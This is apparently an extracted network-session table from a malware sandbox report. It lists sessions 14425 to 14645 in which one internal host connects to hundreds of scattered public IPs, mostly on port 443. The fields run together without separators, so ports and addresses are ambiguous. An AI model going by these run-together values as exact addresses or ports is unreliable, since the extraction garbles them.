                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14425192.168.2.2360062129.40.121.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14426192.168.2.235399232.52.162.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14427192.168.2.2336956179.156.196.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14428192.168.2.2356620158.86.146.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14429192.168.2.2349600185.243.182.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14430192.168.2.234627668.135.160.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14431192.168.2.2337260158.147.239.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14432192.168.2.234204690.132.18.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14433192.168.2.2335422158.222.108.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14434192.168.2.2352444189.244.170.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14435192.168.2.233602035.97.16.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14436192.168.2.2334612147.22.2.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14437192.168.2.2343972219.215.17.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14438192.168.2.235484664.246.52.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14439192.168.2.234122851.137.188.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14440192.168.2.2345766119.229.152.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14441192.168.2.2359348185.180.155.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14442192.168.2.234738696.222.57.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14443192.168.2.2350776177.51.9.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14444192.168.2.235090623.40.37.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14445192.168.2.233960088.139.91.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14446192.168.2.2340552138.191.8.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14447192.168.2.2358266143.223.167.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14448192.168.2.2343222174.160.58.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14449192.168.2.235318062.143.70.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14450192.168.2.234014434.248.42.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14451192.168.2.234898099.94.155.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14452192.168.2.235732479.199.95.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14453192.168.2.2333366111.114.227.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14454192.168.2.235808094.10.140.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14455192.168.2.235284246.228.20.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14456192.168.2.235596634.199.213.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14457192.168.2.233350268.73.46.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14458192.168.2.2333426111.122.171.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14459192.168.2.2345800139.252.248.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14460192.168.2.2341888123.42.90.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14461192.168.2.2342744116.209.95.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14462192.168.2.2353350128.167.250.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14463192.168.2.234696060.10.9.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14464192.168.2.2358542112.220.24.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14465192.168.2.235876212.239.229.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14466192.168.2.234452213.22.139.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14467192.168.2.2339600146.164.24.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14468192.168.2.2356838113.92.103.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14469192.168.2.2348476216.65.22.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14470192.168.2.2354552136.163.209.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14471192.168.2.2356634217.67.91.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14472192.168.2.2347088148.248.113.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14473192.168.2.2360760112.24.30.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14474192.168.2.235690063.99.142.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14475192.168.2.2345256187.132.129.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14476192.168.2.2347240151.90.202.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14477192.168.2.2354544112.140.142.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14478192.168.2.2360484106.52.69.1338080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14479192.168.2.2342426218.106.182.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14480192.168.2.2347308206.155.204.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14481192.168.2.2342474180.6.10.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14482192.168.2.2346018118.139.91.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14483192.168.2.2332892197.234.94.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14484192.168.2.2351922174.151.187.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14485192.168.2.235447094.201.37.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14486192.168.2.235742032.92.215.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14487192.168.2.2342056177.189.22.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14488192.168.2.235207836.149.102.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14489192.168.2.2360062162.28.22.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14490192.168.2.234481219.6.18.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14491192.168.2.2351800115.198.232.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14492192.168.2.233308487.204.81.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14493192.168.2.233391064.112.83.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14494192.168.2.235868018.62.202.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14495192.168.2.2338380198.117.197.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14496192.168.2.2350184135.4.154.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14497192.168.2.2339446161.160.95.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14498192.168.2.2347688163.188.90.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14499192.168.2.23551364.240.227.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14500192.168.2.2338702144.226.225.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14501192.168.2.2341624181.167.117.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14502192.168.2.2352876100.136.73.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14503192.168.2.2337836120.25.154.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14504192.168.2.2349308212.25.73.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14505192.168.2.2349574110.239.162.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14506192.168.2.2353454189.23.70.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14507192.168.2.2348384205.249.130.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14508192.168.2.2357950144.125.18.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14509192.168.2.2338264143.4.252.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14510192.168.2.2358890159.171.100.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14511192.168.2.2351692130.34.21.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14512192.168.2.233913447.123.206.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14513192.168.2.235844441.161.155.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14514192.168.2.2343816223.61.232.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14515192.168.2.2342708181.188.37.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14516192.168.2.2333580122.36.10.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14517192.168.2.2353638186.220.174.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14518192.168.2.233463475.126.110.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14519192.168.2.235424857.61.104.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14520192.168.2.2358224160.51.43.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14521192.168.2.23476181.82.181.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14522192.168.2.2347264176.15.246.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14523192.168.2.2356194114.95.221.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14524192.168.2.235531045.108.169.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14525192.168.2.2349850124.144.153.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14526192.168.2.2340536209.211.140.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14527192.168.2.2348632108.203.237.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14528192.168.2.2359864195.93.13.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14529192.168.2.234652475.158.16.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14530192.168.2.2337696111.211.155.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14531192.168.2.235617845.140.27.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14532192.168.2.233843064.108.146.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14533192.168.2.233298074.104.140.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14534192.168.2.23330605.188.57.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14535192.168.2.234460436.8.26.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14536192.168.2.2338044141.192.212.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14537192.168.2.234554284.45.95.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14538192.168.2.234846632.173.120.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14539192.168.2.235104435.233.77.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14540192.168.2.233445214.76.51.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14541192.168.2.2333500114.189.15.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14542192.168.2.235384285.65.14.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14543192.168.2.233615884.225.24.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14544192.168.2.2344404217.45.125.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14545192.168.2.233552836.247.83.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14546192.168.2.235901247.10.215.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14547192.168.2.2358248155.63.74.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14548192.168.2.234755438.73.69.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14549192.168.2.2341412153.43.88.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14550192.168.2.2340430189.231.130.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14551192.168.2.2350138212.120.136.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14552192.168.2.235844668.125.146.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14553192.168.2.2341286128.135.118.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14554192.168.2.2351918132.217.246.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14555192.168.2.2350980147.157.174.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14556192.168.2.2350834223.180.45.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14557192.168.2.2334392218.139.5.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14558192.168.2.2336484157.172.248.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14559192.168.2.2356000162.123.55.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14560192.168.2.235122682.74.124.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14561192.168.2.2336166104.68.199.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14562192.168.2.2360734194.138.51.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14563192.168.2.2353484153.44.43.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14564192.168.2.233875487.186.53.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14565192.168.2.2356512198.157.50.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14566192.168.2.2346968207.101.61.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14567192.168.2.2355430136.166.122.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14568192.168.2.2351466138.198.64.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14569192.168.2.2333456210.89.134.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14570192.168.2.2357784155.7.163.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14571192.168.2.2349496201.183.182.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14572192.168.2.2352702170.206.77.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14573192.168.2.2352760107.148.84.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14574192.168.2.2355686136.204.108.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14575192.168.2.2349576154.98.62.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14576192.168.2.235020418.179.16.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14577192.168.2.2342696192.24.48.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14578192.168.2.234430241.107.107.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14579192.168.2.235487218.46.24.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14580192.168.2.234547859.224.139.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14581192.168.2.235275482.127.243.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14582192.168.2.2337252192.74.150.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14583192.168.2.234038677.96.103.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14584192.168.2.2342426160.33.109.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14585192.168.2.2357448163.218.58.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14586192.168.2.23453489.139.8.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14587192.168.2.23545744.206.61.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14588192.168.2.234998247.110.4.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14589192.168.2.233402479.181.5.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14590192.168.2.2355706132.147.4.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14591192.168.2.2341972198.14.151.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14592192.168.2.2337648184.115.187.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14593192.168.2.235874678.219.170.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14594192.168.2.2342128205.175.64.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14595192.168.2.2339778103.69.203.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14596192.168.2.2342744212.155.74.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14597192.168.2.2359482158.225.83.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14598192.168.2.2347894207.112.138.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14599192.168.2.2339888115.45.189.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14600192.168.2.23416809.95.54.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14601192.168.2.234442425.182.144.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14602192.168.2.235470253.26.68.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14603192.168.2.236099879.130.34.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14604192.168.2.234855263.151.46.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14605192.168.2.233942439.166.106.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14606192.168.2.235847692.62.111.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14607192.168.2.2341988143.18.157.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14608192.168.2.2359168145.80.48.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14609192.168.2.233973863.186.7.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14610192.168.2.2353976166.9.24.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14611192.168.2.235062499.195.36.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14612192.168.2.2346092104.189.105.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14613192.168.2.2359258206.195.125.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14614192.168.2.2342434107.133.120.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14615192.168.2.234957040.43.207.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14616192.168.2.2352218179.97.235.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14617192.168.2.235601263.135.103.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14618192.168.2.2350022167.87.6.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14619192.168.2.234552686.7.80.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14620192.168.2.2360400204.77.218.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14621192.168.2.233706825.162.122.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14622192.168.2.234841648.30.149.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14623192.168.2.234186491.93.197.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14624192.168.2.2338198143.133.9.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14625192.168.2.2355200122.192.19.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14626192.168.2.2358312159.107.26.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14627192.168.2.2352498191.22.248.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14628192.168.2.2340306219.227.99.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14629192.168.2.233692270.28.49.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14630192.168.2.2359088129.4.141.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14631192.168.2.2334796174.100.199.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14632192.168.2.2338750178.72.103.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14633192.168.2.2340254131.141.14.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14634192.168.2.235837895.174.59.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14635192.168.2.233722886.87.239.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14636192.168.2.234061638.135.83.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14637192.168.2.2348168116.110.85.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14638192.168.2.2345370134.109.20.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14639192.168.2.235045846.124.61.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14640192.168.2.2351264172.62.181.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14641192.168.2.235531693.204.143.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14642192.168.2.2337638202.97.196.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14643192.168.2.2336750191.225.68.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14644192.168.2.2344268208.44.115.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14645192.168.2.2338132199.233.125.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
